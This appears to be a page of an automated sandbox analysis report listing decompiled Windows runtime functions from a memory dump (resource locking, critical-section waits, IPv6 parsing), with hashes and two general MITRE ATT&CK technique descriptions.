Opcode ID: 145405dce3c838e0af53aec68c7f3f922fa62bff9c0477700d4031cb458e1293
Instruction ID: 5d4ccea50526b99de4728643a89cd35aa56d5ef602ec7a77af08dc71b3cb94f6
Opcode Fuzzy Hash: 145405dce3c838e0af53aec68c7f3f922fa62bff9c0477700d4031cb458e1293
Instruction Fuzzy Hash: 31218EB2900219ABCF20DF68CD41AEE73FCAB50704F54C555F84A93141DB70AA588BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00A553A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00A553A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00b101c0;
									_push(_t92);
									_push(0);
									_t37 = E00A2F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00A74FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00A83F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00A83F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00AB217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A83F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00A73915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00A55384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00A2F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00A73915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00A2F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00A73915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00A2F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00A73915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00A55329(_t74, _t92);
													_push(1);
													_t48 = E00A553A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x00a553ab
0x00a553ae
0x00a553b1
0x00a553b4
0x00a553b7
0x00a705b6
0x00a705c0
0x00a705c3
0x00000000
0x00a705c9
0x00a705c9
0x00a705cc
0x00a705d5
0x00a705d5
0x00a553bd
0x00a553bd
0x00a553bd
0x00a553be
0x00a553be
0x00a553be
0x00a553c0
0x00000000
0x00000000
0x00a92269
0x00a9226d
0x00a92349
0x00a9234d
0x00a92273
0x00a92276
0x00a92279
0x00a9227e
0x00a92283
0x00a92287
0x00a9228a
0x00a9228d
0x00a9228f
0x00a922bc
0x00a922bc
0x00a922bc
0x00a922be
0x00a922c4
0x00a922cc
0x00a922d0
0x00a922d6
0x00a922d7
0x00a922da
0x00a922df
0x00a922e4
0x00000000
0x00000000
0x00a922e6
0x00a922e9
0x00a922f4
0x00a922f9
0x00a922fa
0x00a92305
0x00a92314
0x00a92319
0x00a9231a
0x00a9231d
0x00a92320
0x00a92323
0x00a92323
0x00a92328
0x00a9232d
0x00a9232f
0x00a92331
0x00a92336
0x00a92336
0x00a9233b
0x00a9233d
0x00a92350
0x00a92351
0x00a92356
0x00a92359
0x00a92359
0x00a9235b
0x00a9235d
0x00a55367
0x00a5536b
0x00a55372
0x00000000
0x00000000
0x00000000
0x00000000
0x00a92363
0x00a92363
0x00a92369
0x00a9236a
0x00a9236c
0x00a92371
0x00a92373
0x00000000
0x00a92379
0x00a92379
0x00a9237a
0x00a9237f
0x00a9237f
0x00a92385
0x00a92386
0x00a92389
0x00a9238e
0x00a92390
0x00a55378
0x00a5537c
0x00a92396
0x00a92396
0x00a92397
0x00a9239c
0x00a923a2
0x00a923a3
0x00a923a6
0x00a923ab
0x00a923ad
0x00000000
0x00a923b3
0x00a923b3
0x00a923b4
0x00a923b9
0x00a923ba
0x00a923ba
0x00a923bc
0x00a923bf
0x00000000
0x00000000
0x00a89153
0x00a89158
0x00a8915a
0x00a8915e
0x00a89160
0x00000000
0x00a89166
0x00a89166
0x00a89171
0x00a89176
0x00a89176
0x00000000
0x00a89160
0x00a923c6
0x00a923cb
0x00a923ce
0x00a923d7
0x00a923d7
0x00a923ad
0x00a92390
0x00a92373
0x00a9233f
0x00a9233f
0x00000000
0x00a9233f
0x00a92291
0x00a92291
0x00a92293
0x00a92295
0x00a9229a
0x00a922a1
0x00a922a3
0x00a922a7
0x00a922a9
0x00000000
0x00000000
0x00a922ab
0x00a922ad
0x00a922af
0x00000000
0x00000000
0x00000000
0x00a922af
0x00a922b1
0x00a922b4
0x00a922b4
0x00a922b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00a922b6
0x00a9228f
0x00000000
0x00a9226d
0x00a553cb
0x00a553ce
0x00a553d0
0x00a553d4
0x00a553d6
0x00000000
0x00a553d8
0x00a553e3
0x00a553ea
0x00a553ea
0x00a553d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A922F4

Strings

RTL: Re-Waiting, xrefs: 00A92328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A922FC
RTL: Resource at %p, xrefs: 00A9230B

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: ad2bf611962694bb78ea866cbb8e3413c909ecb36b07ea0055a15ca4eccae4e7
Instruction ID: d22e4482ef95fd9dfbc36e2963cf01248b6c11e25a252f9c94df189863593ae0
Opcode Fuzzy Hash: ad2bf611962694bb78ea866cbb8e3413c909ecb36b07ea0055a15ca4eccae4e7
Instruction Fuzzy Hash: 0851E372B006017ADF119B38DD91FA673E8AF58760F114229FE09DF281EA71ED4587A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A5EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00A5EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00A4DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xb1793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00A316C0(_t39);
				} else {
					_t40 = E00A2F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00A73915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00A301A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xb1793c; // 0x0
								_push(_t85);
								_t44 = E00A31F28(_t71);
							} else {
								_t44 = E00A2F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00A73915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00AB2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00A5EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00A74FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00A83F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00A83F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xb120c0;
								if(_t85 != 0xb120c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00AB217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00A83F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x00a5ec56
0x00a5ec56
0x00a5ec56
0x00a5ec5c
0x00a5ec64
0x00a923e6
0x00a923eb
0x00a923eb
0x00a5ec6a
0x00a5ec6c
0x00a5ec6f
0x00a923f3
0x00a923f8
0x00a923fa
0x00a923fc
0x00a5ec75
0x00a5ec76
0x00a5ec76
0x00a5ec7b
0x00a5ec7c
0x00a5ec7e
0x00a92406
0x00a92407
0x00a9240c
0x00a9240d
0x00a9240d
0x00a9240d
0x00a92414
0x00a92417
0x00a9241e
0x00a92435
0x00a92438
0x00a9243c
0x00a9243f
0x00a92442
0x00a92443
0x00a92446
0x00a92449
0x00a92453
0x00a92455
0x00a9245b
0x00a9245b
0x00a5eb99
0x00a5eb99
0x00a5eb9c
0x00a5eb9d
0x00a5eb9f
0x00a5eba2
0x00a92465
0x00a9246b
0x00a9246d
0x00a5eba8
0x00a5eba9
0x00a5eba9
0x00a5ebae
0x00a5ebb3
0x00a5ebb9
0x00a5ebbb
0x00a92513
0x00a92514
0x00a92519
0x00a9251b
0x00a5ec2a
0x00a5ec2d
0x00a5ec33
0x00a5ec36
0x00a5ec3a
0x00a5ec3e
0x00a5ec40
0x00a5ec47
0x00a5ec47
0x00a5ec40
0x00a322c6
0x00a5ebc1
0x00a5ebc1
0x00a5ebc5
0x00a5ec9a
0x00a5ec9a
0x00a5ebd6
0x00a5ebd6
0x00000000
0x00a5ebbb
0x00a92477
0x00a9247c
0x00a92486
0x00a9248b
0x00a92496
0x00a9249b
0x00a9249d
0x00a924a0
0x00a924a3
0x00a924aa
0x00a924aa
0x00a924a5
0x00a924a5
0x00a924a5
0x00a924ac
0x00a924af
0x00a924b0
0x00a924b3
0x00a924b9
0x00a924ba
0x00a924bb
0x00a924c6
0x00a924cb
0x00a924cd
0x00a924d0
0x00a924d1
0x00a924d4
0x00a924d6
0x00a924d9
0x00a924d9
0x00a924dc
0x00a924df
0x00a924e1
0x00a924e7
0x00a924e9
0x00a924ec
0x00a924ef
0x00a924f2
0x00a924f2
0x00a924ef
0x00a924e7
0x00a924fa
0x00a924ff
0x00a92501
0x00a92503
0x00a92506
0x00a9250b
0x00a5eb8c
0x00a5eb93
0x00000000
0x00000000
0x00a5eb93
0x00000000
0x00a5eb99
0x00a5ec85
0x00a5ec85
0x00a5ec85
0x00000000

Strings

RTL: Re-Waiting, xrefs: 00A924FA
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00A9248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00A924BD

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 3cd3f0e24be215edb052d125f152f41605e71ac1e039690ff6cd4b1d248ceb29
Instruction ID: 40259af8de1ae65d96be468d530653063aa5a121805eecd220889448122b44a6
Opcode Fuzzy Hash: 3cd3f0e24be215edb052d125f152f41605e71ac1e039690ff6cd4b1d248ceb29
Instruction Fuzzy Hash: 3041E671600204BBCB24DB68DD85FAA77F8EF84720F208615F9559B2C1D734EE4187A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A6FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A6FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00A6EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00A6EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00A6685D(_t167, 4) == 0) {
								if(E00A6685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00A6685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00A6685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00A48980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00A3DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00A6EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00A6EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x00a6fcd1
0x00a6fcd6
0x00a6fcd9
0x00a6fcdc
0x00a6fcdf
0x00a6fce2
0x00a6fce5
0x00a6fce8
0x00a6fceb
0x00a6fced
0x00a6fced
0x00a6fcf3
0x00000000
0x00000000
0x00a6fcfc
0x00a6fcfe
0x00a6fdc1
0x00a9ecbd
0x00000000
0x00a9eccc
0x00a9eccc
0x00a9ecd2
0x00000000
0x00000000
0x00a9ecdf
0x00a9ece0
0x00a9ece4
0x00a9eceb
0x00a9ecee
0x00a9eca8
0x00a9eca8
0x00a9ecaa
0x00a6fd76
0x00a6fd79
0x00a6fdb4
0x00a6fdb5
0x00a6fdb6
0x00000000
0x00a6fdb6
0x00a6fd7e
0x00a9ecfc
0x00a6fe2f
0x00000000
0x00a6fe2f
0x00a9ed08
0x00a9ed0f
0x00a9ed17
0x00a9ed1b
0x00000000
0x00a9ed1b
0x00a6fd88
0x00000000
0x00000000
0x00a6fd94
0x00a6fd99
0x00a6fda1
0x00000000
0x00000000
0x00a6fdb0
0x00000000
0x00a6fdb0
0x00a9ecbd
0x00a6fdc7
0x00a6fdcb
0x00000000
0x00a6fdd7
0x00a6fde3
0x00a6fe06
0x00a81fe7
0x00000000
0x00000000
0x00a81fef
0x00a81ff0
0x00a81ff4
0x00a81ff7
0x00a81ffa
0x00a81ffd
0x00a82000
0x00000000
0x00000000
0x00a9ecf1
0x00000000
0x00a9ecf1
0x00000000
0x00a6fe06
0x00a6fde8
0x00a6fdec
0x00a6fdef
0x00a6fdf2
0x00000000
0x00a6fdf2
0x00a6fdcb
0x00a6fd04
0x00a6fd05
0x00a9ec67
0x00000000
0x00000000
0x00a9ec6f
0x00000000
0x00a9ec6f
0x00a6fd13
0x00a6fd3c
0x00a6fd40
0x00a9ec75
0x00a9ec7a
0x00000000
0x00a9ec8a
0x00a9ec8a
0x00a9ec90
0x00a9ecb2
0x00a6fd73
0x00a6fd73
0x00000000
0x00a6fd73
0x00a9ec95
0x00000000
0x00000000
0x00a9eca1
0x00a9eca4
0x00a9eca5
0x00000000
0x00a9eca5
0x00a9ec7a
0x00a6fd4a
0x00000000
0x00a6fd6e
0x00a6fd6e
0x00a6fd71
0x00000000
0x00a6fd71
0x00a6fd4a
0x00a6fd21
0x00a7a3a1
0x00000000
0x00a7a3a1
0x00a6fd36
0x00a8200b
0x00a82012
0x00000000
0x00000000
0x00a82018
0x00000000
0x00a82018
0x00000000
0x00a6fd36
0x00a6fe0f
0x00a6fe16
0x00a7a3ad
0x00000000
0x00000000
0x00a7a3b3
0x00a7a3b3
0x00a6fe1f
0x00a9ed25
0x00a9ed86
0x00000000
0x00000000
0x00a9ed91
0x00a9ed95
0x00a9ed95
0x00a9ed9a
0x00a9edad
0x00a9edb3
0x00a9edba
0x00a9edc4
0x00a9edc9
0x00000000
0x00a9edcc
0x00a9ed2a
0x00a9ed55
0x00000000
0x00000000
0x00a9ed61
0x00a9ed66
0x00a9ed6e
0x00000000
0x00000000
0x00a9ed7d
0x00000000
0x00a9ed7d
0x00a9ed30
0x00000000
0x00000000
0x00a9ed3c
0x00a9ed43
0x00a9ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 00A6FD94

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 08c5ea116333cc378989731cce979bdabdeeb7d60e2e22dd3df06194297701da
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 84919271E0020AEFDF28DFA8D8456EEBBB4FF55304F24807AD451A7262E7315A91CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

